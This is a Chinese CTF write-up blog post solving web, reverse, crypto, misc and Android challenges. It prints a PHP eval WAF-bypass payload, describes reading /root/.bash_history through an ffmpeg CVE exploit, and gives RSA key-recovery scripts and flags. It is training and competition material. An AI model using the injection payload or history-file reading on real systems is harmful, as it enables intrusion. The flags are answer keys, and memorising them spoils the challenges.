Web

shell

<?php
error_reporting(0);
require "waf.php";
if (!isset($_GET['code'])) {
show_source(__FILE__);
 exit();
} else {
$code = $_GET['code'];
if (!preg_match($waf, $code)) {
eval("$code");
} else die('hacker');
}
?>

用require包含,取反/flag,url编码括号,然后结尾用?>

?code=require%40%7e%D0%99%93%9E%98?>

图片

hunan_ffmpeg

cve-2017-9993,github上找到exp

图片

读root用户的历史命令,/root/.bash_history

图片

得到/var/www/flag_aaaa.txt文件路径

图片

RE

re1

窗口程序,找到按钮事件处理函数即可。IDA中化简一下流程,如下。

图片

可以看见读取文本框输入,进行base64加密需要注意的是这个base64算法对base64表进行一下移动,到时候修正一下即可;base64编码输出的字符串再与key进行异或并与一个数组进行比较。这个key由rand函数给出,由于这里没有初始话srand函数,那么rand的值将不会动态变化。我们拖入OD进行取得这个这个值即可解密数据了。

图片

可以看见这个值是0x29。接下来写个脚本即可。

import base64

data = [
    0x47, 0x68, 0x65, 0x5F, 0x47, 0x7B, 0x6E, 0x7B, 0x4A, 0x1A,
    0x1D, 0x79, 0x4B, 0x51, 0x50, 0x78, 0x4F, 0x40, 0x4B, 0x1B,
    0x4F, 0x51, 0x1C, 0x1A, 0x4A, 0x41, 0x47, 0x1C, 0x4B, 0x51,
    0x5C, 0x7D, 0x4B, 0x1D, 0x11, 0x7B, 0x4B, 0x67, 0x50, 0x66,
    0x4B, 0x41, 0x47, 0x1D, 0x48, 0x67, 0x48, 0x62, 0x4F, 0x45,
    0x66]
key = 0x29

s = []
for i in range(len(data)):
    s.append((data[i] ^ key) & 0xFF)
print(''.join(map(chr, s))) # enstr
enstr = "nALvnRGRc34PbxyQfib2fx53chn5bxuTb48RbNyObhn4aNaKflO"
b64_table1   = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
b64_table2 = "0123456789+/abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
flag = ""
for i in range(len(enstr)):
    for j in range(len(b64_table2)):
        if enstr[i] == b64_table2[j]:
            flag += b64_table1[j]
            break
print(base64.b64decode(flag+'=')) #补上一个=

flag{7815696ECBF1C96E6894B779456D330E}

CRYPTO

math

读脚本,可知该加密代码对flag按位进行先+=pad后*=ord(char)的操作,反向思考,应先/=ord(char)后-=pad的操作。类似递归的思想,想到用yafu先分解因数,得

***factors found***

P1 = 3
P1 = 3
P1 = 5
P1 = 5
P1 = 7
P3 = 107
P3 = 487
P3 = 607
P5 = 29287
P5 = 28429
P19 = 1002528655290265069
P12 = 420577267963
P16 = 3680317203978923

经过搜索,在https://0x90r00t.com/fr/2017/07/16/meepwn-2017-crypto-100-math-write-up/#more-3278找到类似脚本:

#!/usr/bin/python
import itertools
from Crypto.Util.number import *
from hashlib import md5

l = [3,3,5,5,7,107,487,607,28429,29287,420577267963,3680317203978923,1002528655290265069] 

nbre_permutation = 6
comb = list(itertools.permutations(l, nbre_permutation))
candidat = list()
for i in comb:
    p = 1
    for j in range(nbre_permutation):
        p *= i[j]
    if p not in candidat and p > 10000000000000000000000000000000000000: candidat.append(p) # Au moins 37 chiffres

charset = [' ', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-', '.', '/', '0', '1',
          '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', 'D', 'E',
          'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
          'Z', '[', '\\', ']', '^', '_', '`', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
          'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}']

hack = 64364485357060434848865708402537097493512746702748009007197338675
for p in candidat:
    for c in charset:
        l = hack/ord(c)
        if l*ord(c) == hack:
            h = hack/ord(c) - p
            for c1 in charset:
                l1 = h/ord(c1)
                if l1*ord(c1) == h:
                    h1 = h/ord(c1) -p
                    for c2 in charset:
                        l2 = h1/ord(c2)
                        if l2*ord(c2) == h1:
                            h2 = h1/ord(c2) -p
                            for c3 in charset:
                                l3 = h2/ord(c3)
                                if l3*ord(c3) == h2:
                                    h3 = h2/ord(c3) - p
                                    for c4 in charset:
                                        l4 = h3/ord(c4)
                                        if l4*ord(c4) == h3:
                                            h4 = h3/ord(c4) - p
                                            for c5 in charset:
                                                l5 = h4/ord(c5)
                                                if l5*ord(c5) == h4:
                                                    h5 = h4/ord(c5) - p
                                                    for c6 in charset:
                                                        l6 = h5/ord(c6)
                                                        if l6*ord(c6) == h5:
                                                            h6 = h5/ord(c6) - p
                                                            for c7 in charset:
                                                                l7 = h6/ord(c7)
                                                                if l7*ord(c7) == h6:
                                                                    h7 = h6/ord(c7) - p
                                                                    for c8 in charset:
                                                                        l8 = h7/ord(c8)
                                                                        if l8*ord(c8) == h7:
                                                                            h8 = h7/ord(c8) - p
                                                                            for c9 in charset:
                                                                                l9 = h8/ord(c9)
                                                                                if l9*ord(c9) == h8:
                                                                                    h9 = h8/ord(c9) - p
                                                                                    for c10 in charset:
                                                                                        l10 = h9/ord(c10)
                                                                                        if l10*ord(c10) == h9:
                                                                                            h10 = h9/ord(c10) - p
                                                                                            for c11 in charset:
                                                                                                l11 = h10/ord(c11)
                                                                                                if l11*ord(c11) == h10:
                                                                                                    h11 = h10/ord(c11) - p
                                                                                                    for c12 in charset:
                                                                                                        l12 = h11/ord(c12)
                                                                                                        if l12*ord(c12) == h11:
                                                                                                            h12 = h11/ord(c12) - p
                                                                                                            for c13 in charset:
                                                                                                                l13 = h12/ord(c13)
                                                                                                                if l13*ord(c13) == h12:
                                                                                                                    h13 = h12/ord(c13) - p
                                                                                                                    sol = c+c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13
                                                                                                                    if h13 == 0:
                                                                                                                        flag = sol[::-1] # On retourne le string # Verification de la solution pour eliminer les faux positifs
                                                                                                                        pad2 = bytes_to_long(md5(flag).digest())
                                                                                                                        hack2 = 0
                                                                                                                        for char in flag:
                                                                                                                            hack2 += pad2
                                                                                                                            hack2 *= ord(char)
                                                                                                                            if hack2 == hack:
                                                                                                                                print "Bingo !!!"
                                                                                                                                print sol[::-1]

Bingo !!!
d0y0ul1keM@TH?

flag包裹后上交。

rsa

查看附件得到n、e、c,同时得到一个等式2d+phi(n)

求得私钥d,需要变换等式2d+phi(n)

(2𝑑+𝜙(𝑛))⋅𝑒≡2(mod𝜙(𝑛))⟹(2𝑑+𝜙(𝑛))⋅𝑒−2

#!/usr/bin/python
# -*- coding: utf-8 -*-
import gmpy2
import binascii

n=22561172536677648559787604959523195072179259409010314452272275495363968755657659138742248552894595529382230922241140656549843203305826473571445603834757787255736898096406153231539420740606617993518122317969410178044748567867122389763000873035273736666346624950112390179154333942974763371969584888993523474785703126407758739432302547292610981495520537518042779911203114321445895667363586256353373620877601821136901641493999842631467944779970213905636039444786194077923883593166806502276718151627041975659783265190382918098071120315433981040541826821825277381380527761087122467964932153713194745798177997722042776467823
e=65537
c=19328196358751658895450655392637127310222166740765135237100788629359244004186017531913542633846914446577530070361990508415396536818488820222120779983101438854297373364445564149526771854808100054824945213757075977600155153794380392843250249421227703382007213012131876851828154156292326203220320138218001022549062888054700986604924812634110284449199586085012678155983265546720208230278018003075240556412400816319188195980878492235194635353445804239756712398169138480766013684092405117638265070954612493845540746705265223696626365851780172702852574231465793269945857869635628236488314786408909172723290733282538209968247
a =24114829899810646031152927156356440623523513950820570971172657869605295042116148846058663431685177495769257006671204194892172258274371716987566720411992577862665150660975369465525447840121901649254226473481778722127378865051369383216827923429416969207860136204997233907126159519798979336641129811969668501246242088955574999107571615543760265312436830459903515683689045577164832265662220035876790112563967655077079968881948607640842264058086427875121914327767238217629898601698947580820398969991591620306905238666381003642185305206988597488619954300386153696163111726576675781435154124871145727025050765235161063120482

kphi = a*e -2
d = gmpy2.invert(e, kphi)
m = pow((c), d, n)
print(binascii.unhexlify(hex(m)[2:]

//easyctf{ilnirawvhfpey2nrxx}

crypto

观察给定的k,通过测试得rand=2

printord('f')&15^1
printord('f')&15^2
printord('f')&15^3
printord('f')&15^4
printord('l')&15^1
print ord('l')&15^2
printord('l')&15^3
printord('l')&15^4

后根据逻辑写解密脚本:

k = [4, 96, 14, 96, 3, 96, 5, 96, 9, 112, 4, 48, 7, 48, 3, 48, 0, 48, 0, 96, 6, 96, 6, 48, 1, 48, 6, 96, 11, 48, 1, 96, 3, 96, 3, 96, 4, 48, 7, 96, 2, 48, 0, 48, 1, 96, 11, 48, 11, 48, 2, 48, 0, 96, 2, 48, 3, 96, 10, 48, 0, 48, 4, 48, 7, 48, 0, 48, 6, 96, 1, 96, 3, 96, 15, 112]
str1=''
for j in range(0,len(k)):
    for i in range(0,128):
        if(k[j]==i&15^2)and(k[j+1]==i&240):
            str1+=chr(i)
print(str1)

得flag{6512bd43d9caa6e02c990b0a82652dca}

MISC

签到

右键查看源码有一个index.js,搜索flag关键字可以看到有一串this_is_flag的加密,把他丢到console控制台中eval一下就得到flag

misc2

流量包里导出http对象,提取出wihte.jpg,foremost出来一个加密压缩包

追踪tcp流,流0的post里读取出rsa密码的三个参数

pubkey.pem

-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1uyGE5HNypEkYCvQatds
VUbaZ23H9VNOper1LpjHmTC3BO9/JNT2ktLugWW7zlMQ6l4FxxavI7YMA6wnB2zD
ZHYwkwoLlf38ukuc9DXFP0Pk+5HwW/D4KiLOGyIYw4Ro9YhQyVFZ9TyVKFP2g2un
Bq+JhHzQylUQoR6ag8mpyzmB0322WU+lqBK5+luTVYXx4Yv9n2dcyxGLRJCNP5PQ
dfBa2n81MNA9spiEQhE0BfmiUr/9w0jSB2YCSGlNc2YUGnzYAmLaGV8c8T4CkkLD
fwq1aFLw/DBFXKq5cMiLB4YTDYJZKtpbnqSj010BnzxQLR/MCYwkRG/UJ3si6JGV
Phgl05m9ZGc3ACyKDmSHDMrTZooVGDvvDlKRQgi3mjeyP3MDb2BVmNj7kbUdWi+g
aNDVZ5arEYBRt2WLnYxBOx0zZzvTXM79xbQz8ZwzV13a+EeZX11ofQtGvmV9PHfc
a8xUHWdcVGYwA9hU6PoCsXP59cDsCUS+j0jI/asSVMaPWGf+XiVsvENhhF1WEL6z
K6WUwats8ZaN32n2OkQq/XWF+41+jnQC+SnoqxIu8c6bltSa5sq3DzMiJa9mQTEJ
Sv5vQ7tyHNzOZaf9phzTt/S3D663m+aN55Ks1XUh4Tb+QMiKDOi9RmKnpuKwONGv
ejS6TGaMbwhqLwE6o3I30XMCAwDXPw==
-----END PUBLIC KEY-----
分解成n,e
e=55103
n=876813098747546421463300168862219142063670563967729290497344962728682618208375464557133456578904345237283080342121965674942529286999978893353279886394405628316761715180267880166683614455146832334288190677051366196783349078678400070058376390308238544603721083947689923203385385100201810815669307016233238063111244927006818355401316422651700327734122036175405884468111770133076783036163061469574066454827377969469943581423210808147803335010614103495276743164640007085655873215469085138533528671109499311890770132613373981258581619132892549042554356642121626636491037841897222588276842791469310645700904898072520666967004441441270782094397868123164550631074972971503177681742614908764511711713702834462612716322611390677546531575344585304592749936616311681433327531718831987275251485286576443059281134729361333494789576836028432229505203632510231542054739381738901834961574382652680697797327076172559649811127134401032309848035722886023564579780220217473171744413771996476842677457220805828808013215982370374465310715382727188771178750512250241377916497380631154287944620268359285935412030748504705929500744554104293537787353729941338060882119353175475459195528864413817698279035296256820460236171632150286837130413114595288845076910451

test.enc
test.enc

sorsi.html

--------------------------8e31e207cbc93307
Content-Disposition: form-data; name="message"
4BE63F7DDC183321263A3581317E11019EDF61C8BB1AD979B917F1FC2C1C68CA5B587969E6F090503731D067FA2E422059315C40A9C93354C73C39397AEF13100C3496369D4DBCB17CDAADB971E134B7C0D4882D1AAE2A97ACB59FA85A12F83AA041F8B1426DC2C4CBF064F0D814CC5E5AD8461ABC5D9BD84F7A1212C8CBBCA66AF83320669FDA1D3D7783182BC98F0F142A1171313EF06B5A05416113D9EFB2288E652ABEA193567F268555D982FB54A93D45B0BE338FC862DEF4ADFB175473C914600CFEB5959F9B4B37C4AB0B4A31F64B8A6BC016021116E03BD2493E41F84CE3278C2CF52F0C7560C20CAB6FC99C5F7854A5C0B786CB4C57CABBABECEDCF87C5686118A88DF63406E95F68125F94DA2B5472C060938071D52D2D03CA4F4837EE5B2B6AA8DBF49BF30686BAA1C63E
--------------------------8e31e207cbc93307--
4F87A8A98068BF5CEB65D57D9306068012B72FA6181416C160C93CC90E740215

white.jpg尾部

dp=7751661012749222949258552809385749174895956865739325972299639559465809374742308483735506628879118519880945143001221780630055809832772990692212180986487725219300423093229284048997022795756680499342282151274879960921884034548750862023448485065532494904944319853368483751898299769368013407879672169103329790632327580145567337253252494063666153226153788611531854510389023963152458385741697618500707069007654653605202699110946731128724360785116505369040140205472710852590024476477761130687452901656129261260250611670662318568267301970581979667048365222210854306670337482562374349963775733552611475779811292166914098523277

得知n e dp,rsa的dp泄露

import gmpy2 as gp
e = 55103
n = gp.mpz(876813098747546421463300168862219142063670563967729290497344962728682618208375464557133456578904345237283080342121965674942529286999978893353279886394405628316761715180267880166683614455146832334288190677051366196783349078678400070058376390308238544603721083947689923203385385100201810815669307016233238063111244927006818355401316422651700327734122036175405884468111770133076783036163061469574066454827377969469943581423210808147803335010614103495276743164640007085655873215469085138533528671109499311890770132613373981258581619132892549042554356642121626636491037841897222588276842791469310645700904898072520666967004441441270782094397868123164550631074972971503177681742614908764511711713702834462612716322611390677546531575344585304592749936616311681433327531718831987275251485286576443059281134729361333494789576836028432229505203632510231542054739381738901834961574382652680697797327076172559649811127134401032309848035722886023564579780220217473171744413771996476842677457220805828808013215982370374465310715382727188771178750512250241377916497380631154287944620268359285935412030748504705929500744554104293537787353729941338060882119353175475459195528864413817698279035296256820460236171632150286837130413114595288845076910451)
dp = gp.mpz(7751661012749222949258552809385749174895956865739325972299639559465809374742308483735506628879118519880945143001221780630055809832772990692212180986487725219300423093229284048997022795756680499342282151274879960921884034548750862023448485065532494904944319853368483751898299769368013407879672169103329790632327580145567337253252494063666153226153788611531854510389023963152458385741697618500707069007654653605202699110946731128724360785116505369040140205472710852590024476477761130687452901656129261260250611670662318568267301970581979667048365222210854306670337482562374349963775733552611475779811292166914098523277)
for x in range(1, e):
    if(e*dp%x==1):
        p=(e*dp-1)//x+1
        if(n%p!=0):
            continue
        q=n//p
        phin=(p-1)*(q-1)
        d=gp.invert(e, phin)
print(d)

//得到d=39557870959592044058540627911211309496221349509532602874188330532702484236176277242419355988878213568406180021605270251490973772888625801297139063164918287425284823402321941638284221649193238574724433189175719949280500259688120475730271014396789304064839493579187288334276102342142926913012973835224140787704744839455908942009104270669693610415894368399761519858950072782803638325098476867200717369411844393809815794846344156743833168626687960025574977469598661735566856628743555625907742813937139816150853030682119806860040903492811115128392104433738895592223957317658866039135005919452529014122868983115407262364659369886183827966340637963977354022937302149780698541235857495841317173188649283601978311128083999051365006833479326277586269068164424676321975332128323329544397406285578595752816634651956740374500628888764026413455182904712311034776593291188920983488659491148195165297190218263356564894924217336570106573440048146590271033442228757600297227611043677976886726380970675705219837965823886794335005198887893736374428303322728833081754259056407293976488715776723647659077365229859871626801704661498721314726715411100169578026061415643014249578920231096739831781719181165441022216744199217481959573316580319725361562273615

helloapp

题目给了个app,解和题目名字,最终发现一个叫做hell的文件,查看文件头是个doc文件,打开后发现加密了,于是尝试用爆破工具爆破,爆破成功,如下:

图片

图片

flag{fbe6a8ce-8331-439d-bfa6-79a0e874181c}

安卓

SVIP

下载下压缩包来,后缀改为.zip,然后解包。

flag藏得挺深的。在layout目录下。

图片

flag{SG5zd2V0aGV3ZWF0aGVyaXMxMjNfQDIyMjE=}

里面是一个base64解码。

flag{Hnswetheweatheris123_@2221}

分类: 未分类

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*

code